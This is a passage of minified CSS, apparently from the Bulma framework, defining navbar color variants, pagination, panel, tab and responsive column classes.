.navbar-start>.navbar-item{color:#fff}.navbar.is-success .navbar-end .navbar-link.is-active,.navbar.is-success .navbar-end .navbar-link:focus,.navbar.is-success .navbar-end .navbar-link:hover,.navbar.is-success .navbar-end>a.navbar-item.is-active,.navbar.is-success .navbar-end>a.navbar-item:focus,.navbar.is-success .navbar-end>a.navbar-item:hover,.navbar.is-success .navbar-start .navbar-link.is-active,.navbar.is-success .navbar-start .navbar-link:focus,.navbar.is-success .navbar-start .navbar-link:hover,.navbar.is-success .navbar-start>a.navbar-item.is-active,.navbar.is-success .navbar-start>a.navbar-item:focus,.navbar.is-success .navbar-start>a.navbar-item:hover{background-color:#3abb81;color:#fff}.navbar.is-success .navbar-end .navbar-link::after,.navbar.is-success .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-success .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-success .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-success .navbar-item.has-dropdown:hover .navbar-link{background-color:#3abb81;color:#fff}.navbar.is-success .navbar-dropdown a.navbar-item.is-active{background-color:#48c78e;color:#fff}}.navbar.is-warning{background-color:#ffe08a;color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-brand .navbar-link,.navbar.is-warning .navbar-brand>.navbar-item{color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-brand .navbar-link.is-active,.navbar.is-warning .navbar-brand .navbar-link:focus,.navbar.is-warning .navbar-brand .navbar-link:hover,.navbar.is-warning .navbar-brand>a.navbar-item.is-active,.navbar.is-warning .navbar-brand>a.navbar-item:focus,.navbar.is-warning .navbar-brand>a.navbar-item:hover{background-color:#ffd970;color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-brand .navbar-link::after{border-color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-burger{color:rgba(0,0,0,.7)}@media screen and (min-width:1024px){.navbar.is-warning .navbar-end .navbar-link,.navbar.is-warning .navbar-end>.navbar-item,.navbar.is-warning .navbar-start .navbar-link,.navbar.is-warning .navbar-start>.navbar-item{color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-end .navbar-link.is-active,.navbar.is-warning .navbar-end .navbar-link:focus,.navbar.is-warning .navbar-end .navbar-link:hover,.navbar.is-warning .navbar-end>a.navbar-item.is-active,.navbar.is-warning .navbar-end>a.navbar-item:focus,.navbar.is-warning .navbar-end>a.navbar-item:hover,.navbar.is-warning .navbar-start .navbar-link.is-active,.navbar.is-warning .navbar-start .navbar-link:focus,.navbar.is-warning .navbar-start .navbar-link:hover,.navbar.is-warning .navbar-start>a.navbar-item.is-active,.navbar.is-warning .navbar-start>a.navbar-item:focus,.navbar.is-warning .navbar-start>a.navbar-item:hover{background-color:#ffd970;color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-end .navbar-link::after,.navbar.is-warning .navbar-start .navbar-link::after{border-color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-warning .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-warning .navbar-item.has-dropdown:hover .navbar-link{background-color:#ffd970;color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-dropdown a.navbar-item.is-active{background-color:#ffe08a;color:rgba(0,0,0,.7)}}.navbar.is-danger{background-color:#f14668;color:#fff}.navbar.is-danger .navbar-brand .navbar-link,.navbar.is-danger .navbar-brand>.navbar-item{color:#fff}.navbar.is-danger .navbar-brand .navbar-link.is-active,.navbar.is-danger .navbar-brand .navbar-link:focus,.navbar.is-danger .navbar-brand .navbar-link:hover,.navbar.is-danger .navbar-brand>a.navbar-item.is-active,.navbar.is-danger .navbar-brand>a.navbar-item:focus,.navbar.is-danger .navbar-brand>a.navbar-item:hover{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-danger .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-danger .navbar-end .navbar-link,.navbar.is-danger .navbar-end>.navbar-item,.navbar.is-danger .navbar-start .navbar-link,.navbar.is-danger .navbar-start>.navbar-item{color:#fff}.navbar.is-danger .navbar-end .navbar-link.is-active,.navbar.is-danger .navbar-end .navbar-link:focus,.navbar.is-danger .navbar-end .navbar-link:hover,.navbar.is-danger .navbar-end>a.navbar-item.is-active,.navbar.is-danger .navbar-end>a.navbar-item:focus,.navbar.is-danger .navbar-end>a.navbar-item:hover,.navbar.is-danger .navbar-start .navbar-link.is-active,.navbar.is-danger .navbar-start .navbar-link:focus,.navbar.is-danger .navbar-start .navbar-link:hover,.navbar.is-danger .navbar-start>a.navbar-item.is-active,.navbar.is-danger .navbar-start>a.navbar-item:focus,.navbar.is-danger .navbar-start>a.navbar-item:hover{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-end .navbar-link::after,.navbar.is-danger .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-danger .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-danger .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-danger .navbar-item.has-dropdown:hover .navbar-link{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-dropdown a.navbar-item.is-active{background-color:#f14668;color:#fff}}.navbar>.container{align-items:stretch;display:flex;min-height:3.25rem;width:100%}.navbar.has-shadow{box-shadow:0 2px 0 0 #f5f5f5}.navbar.is-fixed-bottom,.navbar.is-fixed-top{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom{bottom:0}.navbar.is-fixed-bottom.has-shadow{box-shadow:0 -2px 0 0 #f5f5f5}.navbar.is-fixed-top{top:0}body.has-navbar-fixed-top,html.has-navbar-fixed-top{padding-top:3.25rem}body.has-navbar-fixed-bottom,html.has-navbar-fixed-bottom{padding-bottom:3.25rem}.navbar-brand,.navbar-tabs{align-items:stretch;display:flex;flex-shrink:0;min-height:3.25rem}.navbar-brand a.navbar-item:focus,.navbar-brand a.navbar-item:hover{background-color:transparent}.navbar-tabs{-webkit-overflow-scrolling:touch;max-width:100vw;overflow-x:auto;overflow-y:hidden}.navbar-burger{color:#4a4a4a;cursor:pointer;display:block;height:3.25rem;position:relative;width:3.25rem;margin-left:auto}.navbar-burger span{background-color:currentColor;display:block;height:1px;left:calc(50% - 8px);position:absolute;transform-origin:center;transition-duration:86ms;transition-property:background-color,opacity,transform;transition-timing-function:ease-out;width:16px}.navbar-burger span:nth-child(1){top:calc(50% - 6px)}.navbar-burger span:nth-child(2){top:calc(50% - 1px)}.navbar-burger span:nth-child(3){top:calc(50% + 4px)}.navbar-burger:hover{background-color:rgba(0,0,0,.05)}.navbar-burger.is-active span:nth-child(1){transform:translateY(5px) rotate(45deg)}.navbar-burger.is-active span:nth-child(2){opacity:0}.navbar-burger.is-active span:nth-child(3){transform:translateY(-5px) rotate(-45deg)}.navbar-menu{display:none}.navbar-item,.navbar-link{color:#4a4a4a;display:block;line-height:1.5;padding:.5rem .75rem;position:relative}.navbar-item .icon:only-child,.navbar-link .icon:only-child{margin-left:-.25rem;margin-right:-.25rem}.navbar-link,a.navbar-item{cursor:pointer}.navbar-link.is-active,.navbar-link:focus,.navbar-link:focus-within,.navbar-link:hover,a.navbar-item.is-active,a.navbar-item:focus,a.navbar-item:focus-within,a.navbar-item:hover{background-color:#fafafa;color:#485fc7}.navbar-item{flex-grow:0;flex-shrink:0}.navbar-item img{max-height:1.75rem}.navbar-item.has-dropdown{padding:0}.navbar-item.is-expanded{flex-grow:1;flex-shrink:1}.navbar-item.is-tab{border-bottom:1px solid transparent;min-height:3.25rem;padding-bottom:calc(.5rem - 1px)}.navbar-item.is-tab:focus,.navbar-item.is-tab:hover{background-color:transparent;border-bottom-color:#485fc7}.navbar-item.is-tab.is-active{background-color:transparent;border-bottom-color:#485fc7;border-bottom-style:solid;border-bottom-width:3px;color:#485fc7;padding-bottom:calc(.5rem - 3px)}.navbar-content{flex-grow:1;flex-shrink:1}.navbar-link:not(.is-arrowless){padding-right:2.5em}.navbar-link:not(.is-arrowless)::after{border-color:#485fc7;margin-top:-.375em;right:1.125em}.navbar-dropdown{font-size:.875rem;padding-bottom:.5rem;padding-top:.5rem}.navbar-dropdown .navbar-item{padding-left:1.5rem;padding-right:1.5rem}.navbar-divider{background-color:#f5f5f5;border:none;display:none;height:2px;margin:.5rem 0}@media screen and (max-width:1023px){.navbar>.container{display:block}.navbar-brand .navbar-item,.navbar-tabs .navbar-item{align-items:center;display:flex}.navbar-link::after{display:none}.navbar-menu{background-color:#fff;box-shadow:0 8px 16px rgba(10,10,10,.1);padding:.5rem 0}.navbar-menu.is-active{display:block}.navbar.is-fixed-bottom-touch,.navbar.is-fixed-top-touch{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom-touch{bottom:0}.navbar.is-fixed-bottom-touch.has-shadow{box-shadow:0 -2px 3px rgba(10,10,10,.1)}.navbar.is-fixed-top-touch{top:0}.navbar.is-fixed-top .navbar-menu,.navbar.is-fixed-top-touch .navbar-menu{-webkit-overflow-scrolling:touch;max-height:calc(100vh - 3.25rem);overflow:auto}body.has-navbar-fixed-top-touch,html.has-navbar-fixed-top-touch{padding-top:3.25rem}body.has-navbar-fixed-bottom-touch,html.has-navbar-fixed-bottom-touch{padding-bottom:3.25rem}}@media screen and (min-width:1024px){.navbar,.navbar-end,.navbar-menu,.navbar-start{align-items:stretch;display:flex}.navbar{min-height:3.25rem}.navbar.is-spaced{padding:1rem 2rem}.navbar.is-spaced .navbar-end,.navbar.is-spaced .navbar-start{align-items:center}.navbar.is-spaced .navbar-link,.navbar.is-spaced a.navbar-item{border-radius:4px}.navbar.is-transparent .navbar-link.is-active,.navbar.is-transparent .navbar-link:focus,.navbar.is-transparent .navbar-link:hover,.navbar.is-transparent a.navbar-item.is-active,.navbar.is-transparent a.navbar-item:focus,.navbar.is-transparent a.navbar-item:hover{background-color:transparent!important}.navbar.is-transparent .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:focus .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:focus-within .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:hover .navbar-link{background-color:transparent!important}.navbar.is-transparent .navbar-dropdown a.navbar-item:focus,.navbar.is-transparent .navbar-dropdown a.navbar-item:hover{background-color:#f5f5f5;color:#0a0a0a}.navbar.is-transparent .navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#485fc7}.navbar-burger{display:none}.navbar-item,.navbar-link{align-items:center;display:flex}.navbar-item.has-dropdown{align-items:stretch}.navbar-item.has-dropdown-up .navbar-link::after{transform:rotate(135deg) translate(.25em,-.25em)}.navbar-item.has-dropdown-up .navbar-dropdown{border-bottom:2px solid #dbdbdb;border-radius:6px 6px 0 0;border-top:none;bottom:100%;box-shadow:0 -8px 8px rgba(10,10,10,.1);top:auto}.navbar-item.is-active .navbar-dropdown,.navbar-item.is-hoverable:focus .navbar-dropdown,.navbar-item.is-hoverable:focus-within .navbar-dropdown,.navbar-item.is-hoverable:hover .navbar-dropdown{display:block}.navbar-item.is-active .navbar-dropdown.is-boxed,.navbar-item.is-hoverable:focus .navbar-dropdown.is-boxed,.navbar-item.is-hoverable:focus-within .navbar-dropdown.is-boxed,.navbar-item.is-hoverable:hover .navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-item.is-active .navbar-dropdown,.navbar.is-spaced .navbar-item.is-hoverable:focus .navbar-dropdown,.navbar.is-spaced .navbar-item.is-hoverable:focus-within .navbar-dropdown,.navbar.is-spaced .navbar-item.is-hoverable:hover .navbar-dropdown{opacity:1;pointer-events:auto;transform:translateY(0)}.navbar-menu{flex-grow:1;flex-shrink:0}.navbar-start{justify-content:flex-start;margin-right:auto}.navbar-end{justify-content:flex-end;margin-left:auto}.navbar-dropdown{background-color:#fff;border-bottom-left-radius:6px;border-bottom-right-radius:6px;border-top:2px solid #dbdbdb;box-shadow:0 8px 8px rgba(10,10,10,.1);display:none;font-size:.875rem;left:0;min-width:100%;position:absolute;top:100%;z-index:20}.navbar-dropdown .navbar-item{padding:.375rem 1rem;white-space:nowrap}.navbar-dropdown a.navbar-item{padding-right:3rem}.navbar-dropdown a.navbar-item:focus,.navbar-dropdown a.navbar-item:hover{background-color:#f5f5f5;color:#0a0a0a}.navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#485fc7}.navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-dropdown{border-radius:6px;border-top:none;box-shadow:0 8px 8px rgba(10,10,10,.1),0 0 0 1px rgba(10,10,10,.1);display:block;opacity:0;pointer-events:none;top:calc(100% + (-4px));transform:translateY(-5px);transition-duration:86ms;transition-property:opacity,transform}.navbar-dropdown.is-right{left:auto;right:0}.navbar-divider{display:block}.container>.navbar .navbar-brand,.navbar>.container .navbar-brand{margin-left:-.75rem}.container>.navbar .navbar-menu,.navbar>.container .navbar-menu{margin-right:-.75rem}.navbar.is-fixed-bottom-desktop,.navbar.is-fixed-top-desktop{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom-desktop{bottom:0}.navbar.is-fixed-bottom-desktop.has-shadow{box-shadow:0 -2px 3px rgba(10,10,10,.1)}.navbar.is-fixed-top-desktop{top:0}body.has-navbar-fixed-top-desktop,html.has-navbar-fixed-top-desktop{padding-top:3.25rem}body.has-navbar-fixed-bottom-desktop,html.has-navbar-fixed-bottom-desktop{padding-bottom:3.25rem}body.has-spaced-navbar-fixed-top,html.has-spaced-navbar-fixed-top{padding-top:5.25rem}body.has-spaced-navbar-fixed-bottom,html.has-spaced-navbar-fixed-bottom{padding-bottom:5.25rem}.navbar-link.is-active,a.navbar-item.is-active{color:#0a0a0a}.navbar-link.is-active:not(:focus):not(:hover),a.navbar-item.is-active:not(:focus):not(:hover){background-color:transparent}.navbar-item.has-dropdown.is-active .navbar-link,.navbar-item.has-dropdown:focus .navbar-link,.navbar-item.has-dropdown:hover .navbar-link{background-color:#fafafa}}.hero.is-fullheight-with-navbar{min-height:calc(100vh - 3.25rem)}.pagination{font-size:1rem;margin:-.25rem}.pagination.is-small{font-size:.75rem}.pagination.is-medium{font-size:1.25rem}.pagination.is-large{font-size:1.5rem}.pagination.is-rounded .pagination-next,.pagination.is-rounded .pagination-previous{padding-left:1em;padding-right:1em;border-radius:9999px}.pagination.is-rounded .pagination-link{border-radius:9999px}.pagination,.pagination-list{align-items:center;display:flex;justify-content:center;text-align:center}.pagination-ellipsis,.pagination-link,.pagination-next,.pagination-previous{font-size:1em;justify-content:center;margin:.25rem;padding-left:.5em;padding-right:.5em;text-align:center}.pagination-link,.pagination-next,.pagination-previous{border-color:#dbdbdb;color:#363636;min-width:2.5em}.pagination-link:hover,.pagination-next:hover,.pagination-previous:hover{border-color:#b5b5b5;color:#363636}.pagination-link:focus,.pagination-next:focus,.pagination-previous:focus{border-color:#485fc7}.pagination-link:active,.pagination-next:active,.pagination-previous:active{box-shadow:inset 0 1px 2px rgba(10,10,10,.2)}.pagination-link[disabled],.pagination-next[disabled],.pagination-previous[disabled]{background-color:#dbdbdb;border-color:#dbdbdb;box-shadow:none;color:#7a7a7a;opacity:.5}.pagination-next,.pagination-previous{padding-left:.75em;padding-right:.75em;white-space:nowrap}.pagination-link.is-current{background-color:#485fc7;border-color:#485fc7;color:#fff}.pagination-ellipsis{color:#b5b5b5;pointer-events:none}.pagination-list{flex-wrap:wrap}.pagination-list li{list-style:none}@media screen and (max-width:768px){.pagination{flex-wrap:wrap}.pagination-next,.pagination-previous{flex-grow:1;flex-shrink:1}.pagination-list li{flex-grow:1;flex-shrink:1}}@media screen and (min-width:769px),print{.pagination-list{flex-grow:1;flex-shrink:1;justify-content:flex-start;order:1}.pagination-ellipsis,.pagination-link,.pagination-next,.pagination-previous{margin-bottom:0;margin-top:0}.pagination-previous{order:2}.pagination-next{order:3}.pagination{justify-content:space-between;margin-bottom:0;margin-top:0}.pagination.is-centered .pagination-previous{order:1}.pagination.is-centered .pagination-list{justify-content:center;order:2}.pagination.is-centered .pagination-next{order:3}.pagination.is-right .pagination-previous{order:1}.pagination.is-right .pagination-next{order:2}.pagination.is-right .pagination-list{justify-content:flex-end;order:3}}.panel{border-radius:6px;box-shadow:0 .5em 1em -.125em rgba(10,10,10,.1),0 0 0 1px rgba(10,10,10,.02);font-size:1rem}.panel:not(:last-child){margin-bottom:1.5rem}.panel.is-white .panel-heading{background-color:#fff;color:#0a0a0a}.panel.is-white .panel-tabs a.is-active{border-bottom-color:#fff}.panel.is-white .panel-block.is-active .panel-icon{color:#fff}.panel.is-black .panel-heading{background-color:#0a0a0a;color:#fff}.panel.is-black .panel-tabs a.is-active{border-bottom-color:#0a0a0a}.panel.is-black .panel-block.is-active .panel-icon{color:#0a0a0a}.panel.is-light .panel-heading{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.panel.is-light .panel-tabs a.is-active{border-bottom-color:#f5f5f5}.panel.is-light .panel-block.is-active .panel-icon{color:#f5f5f5}.panel.is-dark .panel-heading{background-color:#363636;color:#fff}.panel.is-dark .panel-tabs a.is-active{border-bottom-color:#363636}.panel.is-dark .panel-block.is-active .panel-icon{color:#363636}.panel.is-primary .panel-heading{background-color:#00d1b2;color:#fff}.panel.is-primary .panel-tabs a.is-active{border-bottom-color:#00d1b2}.panel.is-primary .panel-block.is-active .panel-icon{color:#00d1b2}.panel.is-link .panel-heading{background-color:#485fc7;color:#fff}.panel.is-link .panel-tabs a.is-active{border-bottom-color:#485fc7}.panel.is-link .panel-block.is-active .panel-icon{color:#485fc7}.panel.is-info .panel-heading{background-color:#3e8ed0;color:#fff}.panel.is-info .panel-tabs a.is-active{border-bottom-color:#3e8ed0}.panel.is-info .panel-block.is-active .panel-icon{color:#3e8ed0}.panel.is-success .panel-heading{background-color:#48c78e;color:#fff}.panel.is-success .panel-tabs a.is-active{border-bottom-color:#48c78e}.panel.is-success .panel-block.is-active .panel-icon{color:#48c78e}.panel.is-warning .panel-heading{background-color:#ffe08a;color:rgba(0,0,0,.7)}.panel.is-warning .panel-tabs a.is-active{border-bottom-color:#ffe08a}.panel.is-warning .panel-block.is-active .panel-icon{color:#ffe08a}.panel.is-danger .panel-heading{background-color:#f14668;color:#fff}.panel.is-danger .panel-tabs a.is-active{border-bottom-color:#f14668}.panel.is-danger .panel-block.is-active .panel-icon{color:#f14668}.panel-block:not(:last-child),.panel-tabs:not(:last-child){border-bottom:1px solid #ededed}.panel-heading{background-color:#ededed;border-radius:6px 6px 0 0;color:#363636;font-size:1.25em;font-weight:700;line-height:1.25;padding:.75em 1em}.panel-tabs{align-items:flex-end;display:flex;font-size:.875em;justify-content:center}.panel-tabs a{border-bottom:1px solid #dbdbdb;margin-bottom:-1px;padding:.5em}.panel-tabs a.is-active{border-bottom-color:#4a4a4a;color:#363636}.panel-list a{color:#4a4a4a}.panel-list a:hover{color:#485fc7}.panel-block{align-items:center;color:#363636;display:flex;justify-content:flex-start;padding:.5em .75em}.panel-block input[type=checkbox]{margin-right:.75em}.panel-block>.control{flex-grow:1;flex-shrink:1;width:100%}.panel-block.is-wrapped{flex-wrap:wrap}.panel-block.is-active{border-left-color:#485fc7;color:#363636}.panel-block.is-active .panel-icon{color:#485fc7}.panel-block:last-child{border-bottom-left-radius:6px;border-bottom-right-radius:6px}a.panel-block,label.panel-block{cursor:pointer}a.panel-block:hover,label.panel-block:hover{background-color:#f5f5f5}.panel-icon{display:inline-block;font-size:14px;height:1em;line-height:1em;text-align:center;vertical-align:top;width:1em;color:#7a7a7a;margin-right:.75em}.panel-icon .fa{font-size:inherit;line-height:inherit}.tabs{-webkit-overflow-scrolling:touch;align-items:stretch;display:flex;font-size:1rem;justify-content:space-between;overflow:hidden;overflow-x:auto;white-space:nowrap}.tabs a{align-items:center;border-bottom-color:#dbdbdb;border-bottom-style:solid;border-bottom-width:1px;color:#4a4a4a;display:flex;justify-content:center;margin-bottom:-1px;padding:.5em 1em;vertical-align:top}.tabs a:hover{border-bottom-color:#363636;color:#363636}.tabs li{display:block}.tabs li.is-active a{border-bottom-color:#485fc7;color:#485fc7}.tabs ul{align-items:center;border-bottom-color:#dbdbdb;border-bottom-style:solid;border-bottom-width:1px;display:flex;flex-grow:1;flex-shrink:0;justify-content:flex-start}.tabs ul.is-left{padding-right:.75em}.tabs ul.is-center{flex:none;justify-content:center;padding-left:.75em;padding-right:.75em}.tabs ul.is-right{justify-content:flex-end;padding-left:.75em}.tabs .icon:first-child{margin-right:.5em}.tabs .icon:last-child{margin-left:.5em}.tabs.is-centered ul{justify-content:center}.tabs.is-right ul{justify-content:flex-end}.tabs.is-boxed a{border:1px solid transparent;border-radius:4px 4px 0 0}.tabs.is-boxed a:hover{background-color:#f5f5f5;border-bottom-color:#dbdbdb}.tabs.is-boxed li.is-active a{background-color:#fff;border-color:#dbdbdb;border-bottom-color:transparent!important}.tabs.is-fullwidth li{flex-grow:1;flex-shrink:0}.tabs.is-toggle a{border-color:#dbdbdb;border-style:solid;border-width:1px;margin-bottom:0;position:relative}.tabs.is-toggle a:hover{background-color:#f5f5f5;border-color:#b5b5b5;z-index:2}.tabs.is-toggle li+li{margin-left:-1px}.tabs.is-toggle li:first-child a{border-top-left-radius:4px;border-bottom-left-radius:4px}.tabs.is-toggle li:last-child a{border-top-right-radius:4px;border-bottom-right-radius:4px}.tabs.is-toggle li.is-active a{background-color:#485fc7;border-color:#485fc7;color:#fff;z-index:1}.tabs.is-toggle ul{border-bottom:none}.tabs.is-toggle.is-toggle-rounded li:first-child a{border-bottom-left-radius:9999px;border-top-left-radius:9999px;padding-left:1.25em}.tabs.is-toggle.is-toggle-rounded li:last-child a{border-bottom-right-radius:9999px;border-top-right-radius:9999px;padding-right:1.25em}.tabs.is-small{font-size:.75rem}.tabs.is-medium{font-size:1.25rem}.tabs.is-large{font-size:1.5rem}.column{display:block;flex-basis:0;flex-grow:1;flex-shrink:1;padding:.75rem}.columns.is-mobile>.column.is-narrow{flex:none;width:unset}.columns.is-mobile>.column.is-full{flex:none;width:100%}.columns.is-mobile>.column.is-three-quarters{flex:none;width:75%}.columns.is-mobile>.column.is-two-thirds{flex:none;width:66.6666%}.columns.is-mobile>.column.is-half{flex:none;width:50%}.columns.is-mobile>.column.is-one-third{flex:none;width:33.3333%}.columns.is-mobile>.column.is-one-quarter{flex:none;width:25%}.columns.is-mobile>.column.is-one-fifth{flex:none;width:20%}.columns.is-mobile>.column.is-two-fifths{flex:none;width:40%}.columns.is-mobile>.column.is-three-fifths{flex:none;width:60%}.columns.is-mobile>.column.is-four-fifths{flex:none;width:80%}.columns.is-mobile>.column.is-offset-three-quarters{margin-left:75%}.columns.is-mobile>.column.is-offset-two-thirds{margin-left:66.6666%}.columns.is-mobile>.column.is-offset-half{margin-left:50%}.columns.is-mobile>.column.is-offset-one-third{margin-left:33.3333%}.columns.is-mobile>.column.is-offset-one-quarter{margin-left:25%}.columns.is-mobile>.column.is-offset-one-fifth{margin-left:20%}.columns.is-mobile>.column.is-offset-two-fifths{margin-left:40%}.columns.is-mobile>.column.is-offset-three-fifths{margin-left:60%}.columns.is-mobile>.column.is-offset-four-fifths{margin-left:80%}.columns.is-mobile>.column.is-0{flex:none;width:0%}.columns.is-mobile>.column.is-offset-0{margin-left:0}.columns.is-mobile>.column.is-1{flex:none;width:8.33333%}.columns.is-mobile>.column.is-offset-1{margin-left:8.33333%}.columns.is-mobile>.column.is-2{flex:none;width:16.66667%}.columns.is-mobile>.column.is-offset-2{margin-left:16.66667%}.columns.is-mobile>.column.is-3{flex:none;width:25%}.columns.is-mobile>.column.is-offset-3{margin-left:25%}.columns.is-mobile>.column.is-4{flex:none;width:33.33333%}.columns.is-mobile>.column.is-offset-4{margin-left:33.33333%}.columns.is-mobile>.column.is-5{flex:none;width:41.66667%}.columns.is-mobile>.column.is-offset-5{margin-left:41.66667%}.columns.is-mobile>.column.is-6{flex:none;width:50%}.columns.is-mobile>.column.is-offset-6{margin-left:50%}.columns.is-mobile>.column.is-7{flex:none;width:58.33333%}.columns.is-mobile>.column.is-offset-7{margin-left:58.33333%}.columns.is-mobile>.column.is-8{flex:none;width:66.66667%}.columns.is-mobile>.column.is-offset-8{margin-left:66.66667%}.columns.is-mobile>.column.is-9{flex:none;width:75%}.columns.is-mobile>.column.is-offset-9{margin-left:75%}.columns.is-mobile>.column.is-10{flex:none;width:83.33333%}.columns.is-mobile>.column.is-offset-10{margin-left:83.33333%}.columns.is-mobile>.column.is-11{flex:none;width:91.66667%}.columns.is-mobile>.column.is-offset-11{margin-left:91.66667%}.columns.is-mobile>.column.is-12{flex:none;width:100%}.columns.is-mobile>.column.is-offset-12{margin-left:100%}@media screen and (max-width:768px){.column.is-narrow-mobile{flex:none;width:unset}.column.is-full-mobile{flex:none;width:100%}.column.is-three-quarters-mobile{flex:none;width:75%}.column.is-two-thirds-mobile{flex:none;width:66.6666%}.column.is-half-mobile{flex:none;width:50%}.column.is-one-third-mobile{flex:none;width:33.3333%}.column.is-one-quarter-mobile{flex:none;width:25%}.column.is-one-fifth-mobile{flex:none;width:20%}.column.is-two-fifths-mobile{flex:none;width:40%}.column.is-three-fifths-mobile{flex:none;width:60%}.column.is-four-fifths-mobile{flex:none;width:80%}.column.is-offset-three-quarters-mobile{margin-left:75%}.column.is-offset-two-thirds-mobile{margin-left:66.6666%}.column.is-offset-half-mobile{margin-left:50%}.column.is-offset-one-third-mobile{margin-left:33.3333%}.column.is-offset-one-quarter-mobile{margin-left:25%}.column.is-offset-one-fifth-mobile{margin-left:20%}.column.is-offset-two-fifths-mobile{margin-left:40%}.column.is-offset-three-fifths-mobile{margin-left:60%}.column.is-offset-four-fifths-mobile{margin-left:80%}.column.is-0-mobile{flex:none;width:0%}.column.is-offset-0-mobile{margin-left:0}.column.is-1-mobile{flex:none;width:8.33333%}.column.is-offset-1-mobile{margin-left:8.33333%}.column.is-2-mobile{flex:none;width:16.66667%}.column.is-offset-2-mobile{margin-left:16.66667%}.column.is-3-mobile{flex:none;width:25%}.column.is-offset-3-mobile{margin-left:25%}.column.is-4-mobile{flex:none;width:33.33333%}.column.is-offset-4-mobile{margin-left:33.33333%}.column.is-5-mobile{flex:none;width:41.66667%}.column.is-offset-5-mobile{margin-left:41.66667%}.column.is-6-mobile{flex:none;width:50%}.column.is-offset-6-mobile{margin-left:50%}.column.is-7-mobile{flex:none;width:58.33333%}.column.is-offset-7-mobile{margin-left:58.33333%}.column.is-8-mobile{flex:none;width:66.66667%}.column.is-offset-8-mobile{margin-left:66.66667%}.column.is-9-mobile{flex:none;width:75%}.column.is-offset-9-mobile{margin-left:75%}.column.is-10-mobile{flex:none;width:83.33333%}.column.is-offset-10-mobile{margin-left:83.33333%}.column.is-11-mobile{flex:none;width:91.66667%}.column.is-offset-11-mobile{margin-left:91.66667%}.column.is-12-mobile{flex:none;width:100%}.column.is-offset-12-mobile{margin-left:100%}}@media screen and (min-width:769px),print{.column.is-narrow,.column.is-narrow-tablet{flex:none;width:unset}.column.is-full,.column.is-full-tablet{flex:none;width:100%}.column.is-three-quarters,.column.is-three-quarters-tablet{flex:none;width:75%}.column.is-two-thirds,.column.is-two-thirds-tablet{flex:none;width:66.6666%}.column.is-half,.column.is-half-tablet{flex:none;width:50%}.column.is-one-third,.column.is-one-third-tablet{flex:none;width:33.3333%}.column.is-one-quarter,.column.is-one-quarter-tablet{flex:none;width:25%}.column.is-one-fifth,.column.is-one-fifth-tablet{flex:none;width:20%}.column.is-two-fifths,.column.is-two-fifths-tablet{flex:none;width:40%}.column.is-three-fifths,.column.is-three-fifths-tablet{flex:none;width:60%}.column.is-four-fifths,.column.is-four-fifths-tablet{flex:none;width:80%}.column.is-offset-three-quarters,.column.is-offset-three-quarters-tablet{margin-left:75%}.column.is-offset-two-thirds,.column.is-offset-two-thirds-tablet{margin-left:66.6666%}.column.is-offset-half,.column.is-offset-half-tablet{margin-left:50%}.column.is-offset-one-third,.column.is-offset-one-third-tablet{margin-left:33.3333%}.column.is-offset-one-quarter,.column.is-offset-one-quarter-tablet{margin-left:25%}.column.is-offset-one-fifth,.column.is-offset-one-fifth-tablet{margin-left:20%}.column.is-offset-two-fifths,.column.is-offset-two-fifths-tablet{margin-left:40%}.column.is-offset-three-fifths,.column.is-offset-three-fifths-tablet{margin-left:60%}.column.is-offset-four-fifths,.column.is-offset-four-fifths-tablet{margin-left:80%}.column.is-0,.column.is-0-tablet{flex:none;width:0%}.column.is-offset-0,.column.is-offset-0-tablet{margin-left:0}.column.is-1,.column.is-1-tablet{flex:none;width:8.33333%}.column.is-offset-1,.column.is-offset-1-tablet{margin-left:8.33333%}.column.is-2,.column.is-2-tablet{flex:none;width:16.66667%}.column.is-offset-2,.column.is-offset-2-tablet{margin-left:16.66667%}.column.is-3,.column.is-3-tablet{flex:none;width:25%}.column.is-offset-3,.column.is-offset-3-tablet{margin-left:25%}.column.is-4,.column.is-4-tablet{flex:none;width:33.33333%}.column.is-offset-4,.column.is-offset-4-tablet{margin-left:33.33333%}.column.is-5,.column.is-5-tablet{flex:none;width:41.66667%}.column.is-offset-5,.column.is-offset-5-tablet{margin-left:41.66667%}.column.is-6,.column.is-6-tablet{flex:none;width:50%}.column.is-offset-6,.column.is-offset-6-tablet{margin-left:50%}.column.is-7,.column.is-7-tablet{flex:none;width:58.33333%}.column.is-offset-7,.column.is-offset-7-tablet{margin-left:58.33333%}.column.is-8,.column.is-8-tablet{flex:none;width:66.66667%}.column.is-offset-8,.column.is-offset-8-tablet{margin-left:66.66667%}.column.is-9,.column.is-9-tablet{flex:none;width:75%}.column.is-offset-9,.column.is-offset-9-tablet{margin-left:75%}.column.is-10,.column.is-10-tablet{flex:none;width:83.33333%}.column.is-offset-10,.column.is-offset-10-tablet{margin-left:83.33333%}.column.is-11,.column.is-11-t